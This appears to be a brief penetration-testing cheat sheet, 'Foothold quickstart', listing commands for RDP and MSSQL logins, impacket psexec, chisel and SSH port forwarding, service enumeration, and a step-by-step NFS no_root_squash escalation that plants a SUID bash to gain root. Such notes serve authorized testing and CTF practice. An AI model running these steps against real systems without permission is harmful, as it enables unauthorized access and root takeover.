Powered by

# Foothold quickstart

# rdp 

xfreerdp /v:10.1.1.1 /u:user /p:password

# mssql console (impacket) 

python3 mssqlclient.py -port 27900 user:password@10.1.1.1

# NFS with no rootsquashing diabled

  1. NFS Access
  2. Gain Low Privilege Shell
  3. Upload Bash Executable to the NFS share
  4. sudo chown root bash && sudo chmod +s bash Set SUID Permissions Through NFS Due To Misconfigured Root Squash `
  5. Login through SSH
  6. ./bash -p Execute SUID Bit Bash, -p preserves privileges
  7. rooted

# psexec.py (impacket) 

python3 psexec.py administrator@10.1.1.1

# Port Forwarding (chisel)

https://github.com/jpillora/chisel

# Services

Enumerate services once foothold is established to see if there are any which aren't served to public

netstat -lepunt
ss -lepunt

# ssh tunnel

forward a port on remote server to yours:

ssh -L 6379:localhost:6379 user@mydomainwhatever.net
ssh -L 6379:localhost:6379 user@mydomainwhatever.net -p 2222

© Copyright 2021. All rights reserved.